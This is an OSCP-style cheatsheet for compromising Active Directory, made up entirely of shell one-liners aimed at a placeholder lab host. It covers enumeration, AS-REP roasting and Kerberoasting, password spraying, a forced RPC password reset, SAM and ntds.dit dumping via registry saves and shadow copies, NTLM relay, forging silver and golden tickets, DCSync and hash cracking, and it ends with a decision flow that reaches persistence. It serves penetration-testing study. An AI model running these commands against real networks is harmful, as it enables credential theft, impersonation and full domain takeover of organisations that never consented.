################################################################################
# OSCP ACTIVE DIRECTORY ENUM + ATTACK CHEATSHEET (CURRENT DIR, ONE-LINERS)
# - ONE-LINERS ONLY
# - NO FOLDER CREATION (you already work per-machine folder)
# - OUTPUTS SAVED AS .txt IN CURRENT DIR
################################################################################

############################
# GLOBAL VARS (SET ONCE)
############################
IP=10.10.10.10
DOMAIN=domain.htb
DC=dc.$DOMAIN
IFACE=eth0

# helpers (one-liner safe)
BASE_DN="DC=$(echo $DOMAIN | sed 's/\./,DC=/g')"

################################################################################
# 0) FAST IDENTIFICATION
################################################################################

nmap -p- -T4 --min-rate 1500 -oN nmap_full.txt $IP
nmap -sC -sV -T4 -p 21,22,53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,1433,47001 -oN nmap_services.txt $IP
nmap -sU --top-ports 50 -T4 -oN nmap_udp.txt $IP

################################################################################
# 1) NO CREDS ENUM
################################################################################

# SMB NULL
netexec smb $IP > smb_info.txt
netexec smb $IP --shares > smb_shares.txt
netexec smb $IP --rid-brute > smb_rid_brute.txt
smbclient -L //$IP/ -N > smb_null_list.txt
smbmap -H $IP -u "" -p "" > smbmap_null.txt

# RPC NULL
rpcclient -U "" -N $IP -c "querydominfo" > rpc_domaininfo.txt
rpcclient -U "" -N $IP -c "enumdomusers" > rpc_users.txt
rpcclient -U "" -N $IP -c "enumdomgroups" > rpc_groups.txt

# LDAP ROOTDSE (discover namingContexts + domain)
ldapsearch -x -H ldap://$IP:389 -s base -b "" namingContexts defaultNamingContext > ldap_rootdse.txt

# Kerberos user enum
kerbrute userenum -d $DOMAIN --dc $IP /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt > kerbrute_users.txt

# AS-REP roast (no creds)
impacket-GetNPUsers $DOMAIN/ -dc-ip $IP -request > asrep_nocreds.txt

# DNS enum (zone transfer may fail; still try)
dig @$IP $DOMAIN ANY +noall +answer > dns_any.txt
dig @$IP $DOMAIN AXFR > dns_axfr.txt
dnsenum $DOMAIN > dnsenum.txt

# Subdomain / vhost brute (if web exists)
ffuf -u http://$DOMAIN/ -H "Host: FUZZ.$DOMAIN" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fs 0 > vhosts_ffuf.txt
ffuf -u http://$IP/ -H "Host: FUZZ.$DOMAIN" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fs 0 > vhosts_ip_ffuf.txt

# Web quick loot
whatweb http://$IP > whatweb.txt
curl -sI http://$IP > http_headers.txt
feroxbuster -u http://$IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,asp,aspx,txt,conf,config,bak,zip -o web_dirs.txt

################################################################################
# 2) GUEST ACCESS ENUM
################################################################################

netexec smb $IP -u guest -p '' > smb_guest_auth.txt
netexec smb $IP -u guest -p '' --shares > smb_guest_shares.txt
netexec smb $IP -u guest -p '' --rid-brute > smb_guest_rid.txt
netexec smb $IP -u guest -p '' --users > smb_guest_users.txt
smbmap -H $IP -u guest -p '' > smbmap_guest.txt

# Share listing + download (example share HR)
smbclient //$IP/HR -U "guest%" -c "recurse;ls" > smb_hr_listing.txt
smbclient //$IP/HR -U "guest%" -c "prompt OFF;recurse ON;mget *" > smb_hr_mget.txt

# GPP passwords (SYSVOL)
netexec smb $IP -u guest -p '' -M gpp_password > gpp_passwords.txt
findsmb.py $DOMAIN/guest:''@$IP > findsmb_guest.txt

# Safe password sprays
kerbrute passwordspray -d $DOMAIN --dc $IP users.txt 'Welcome123' > spray_welcome123.txt
kerbrute passwordspray -d $DOMAIN --dc $IP users.txt 'Password123' > spray_password123.txt
netexec smb $IP -u users.txt -p 'Password123' --continue-on-success > spray_smb_password123.txt
netexec winrm $IP -u users.txt -p 'Password123' --continue-on-success > spray_winrm_password123.txt

################################################################################
# 3) USER / ASSUMED BREACH ENUM
################################################################################

USER=user
PASS=pass

# Auth checks
netexec smb $IP -u $USER -p "$PASS" > auth_smb.txt
netexec winrm $IP -u $USER -p "$PASS" > auth_winrm.txt
netexec ldap $IP -u $USER -p "$PASS" > auth_ldap.txt
netexec smb $IP -u $USER -p "$PASS" --shares > smb_user_shares.txt

# LDAP dump (your requested safer form: explicit port + base DN derived from DOMAIN)
ldapsearch -x -H ldap://$IP:389 -D "$USER@$DOMAIN" -w "$PASS" -b "$BASE_DN" "(objectClass=user)" > ldap_users_raw.txt
grep -i "sAMAccountName:" ldap_users_raw.txt | awk '{print $2}' > users.txt

# SPNs via ldapsearch (quick check)
ldapsearch -x -H ldap://$IP:389 -D "$USER@$DOMAIN" -w "$PASS" -b "$BASE_DN" "(&(objectClass=user)(servicePrincipalName=*))" servicePrincipalName sAMAccountName > ldap_spns.txt

# Descriptions (CICADA-style win)
netexec ldap $IP -u $USER -p "$PASS" -M get-desc-users > ldap_desc_users.txt

# AS-REP roast (with users list)
impacket-GetNPUsers $DOMAIN/$USER:"$PASS" -usersfile users.txt -dc-ip $IP -request > asrep_withcreds.txt

# Kerberoast
impacket-GetUserSPNs $DOMAIN/$USER:"$PASS" -dc-ip $IP -request > kerberoast.txt
targetedKerberoast.py -d $DOMAIN -u $USER -p "$PASS" > kerberoast_targeted.txt

# BloodHound
bloodhound-python -d $DOMAIN -u $USER -p "$PASS" -c All --nameserver $IP > bloodhound_run.txt

# RPC password reset (if rights exist; like your Administrator machine)
rpcclient -U "$DOMAIN/$USER%$PASS" $IP -c "setuserinfo2 victimUser 23 'NewPassword123!'" > rpc_pw_reset.txt

################################################################################
# TIME SKEW FIX (Kerberos)
################################################################################

sudo ntpdate $IP > ntp_sync.txt
faketime -f "+7h" impacket-getTGT $DOMAIN/$USER:"$PASS" -dc-ip $IP > gettgt_faketime.txt

################################################################################
# WINRM / REMOTE EXEC
################################################################################

evil-winrm -i $IP -u $USER -p "$PASS"
wmiexec.py $DOMAIN/$USER:"$PASS"@$IP

################################################################################
# AD CS (DETECT + ENUM + ABUSE)
################################################################################

nmap -p 88,135,139,445,389,636,3268,3269,53,464,9389 --script ldap-rootdse $IP | grep -i pki > adcs_detect.txt
certipy find -u $USER@$DOMAIN -p "$PASS" -dc-ip $IP > certipy_find.txt
certipy req -u $USER@$DOMAIN -p "$PASS" -dc-ip $IP -ca CA-NAME -template TemplateName > certipy_req.txt
certipy auth -pfx user.pfx -dc-ip $IP > certipy_auth.txt

################################################################################
# DELEGATION / MISCONFIG ENUM
################################################################################

netexec ldap $IP -u $USER -p "$PASS" -M find-delegation > delegation.txt
netexec ldap $IP -u $USER -p "$PASS" -M admin-count > admincount.txt
netexec ldap $IP -u $USER -p "$PASS" -M password-not-required > pw_not_required.txt
netexec ldap $IP -u $USER -p "$PASS" -M password-never-expires > pw_never_expires.txt

################################################################################
# BACKUP OPERATORS / LOCAL ADMIN ABUSE
################################################################################

reg save HKLM\SAM SAM
reg save HKLM\SYSTEM SYSTEM
impacket-secretsdump -sam SAM -system SYSTEM LOCAL > local_sam_dump.txt

vssadmin create shadow /for=C: > vss_shadow.txt
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit . > vss_copy_ntds.txt

################################################################################
# NTLM / RELAY / TICKETS (ONE-LINERS)
################################################################################

responder -I $IFACE -wrf
ntlmrelayx.py -tf targets.txt -smb2support > ntlmrelayx.txt

impacket-ticketer -nthash <NTLM_HASH> -domain-sid <DOMAIN_SID> -domain $DOMAIN -spn cifs/$DC Administrator > silver_ticket.txt
impacket-ticketer -nthash <KRBTGT_NTLM> -domain-sid <DOMAIN_SID> -domain $DOMAIN Administrator > golden_ticket.txt
export KRB5CCNAME=Administrator.ccache; netexec smb $IP -k > ptt_smb.txt

################################################################################
# DCSYNC / DOMAIN CREDS DUMP (IF PRIVS)
################################################################################

secretsdump.py $DOMAIN/$USER:"$PASS"@$IP > secretsdump_domain.txt

################################################################################
# HASH CRACKING (YOUR MISSING PART)
################################################################################

hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt -o kerberoast_cracked.txt
hashcat -m 18200 asrep_withcreds.txt /usr/share/wordlists/rockyou.txt -o asrep_cracked.txt
hashcat -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt -o ntlm_cracked.txt
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT ntlm_hashes.txt > john_ntlm.txt

################################################################################
# QUICK DECISION MEMORY (SHORT)
################################################################################
# NO CREDS  -> SMB NULL/RID -> Kerberos enum -> DNS/VHOST -> Web loot
# GUEST     -> SMB shares -> GPP -> Spray -> LDAP minimal
# USER      -> LDAP dump -> BloodHound -> Kerberoast/ASREP -> Delegation/ADCS
# LOCAL ADM -> SAM dump -> reuse
# BACKUP OP -> SAM/NTDS via reg/vss
# DOMAIN AD -> DCSync -> tickets -> persistence
################################################################################
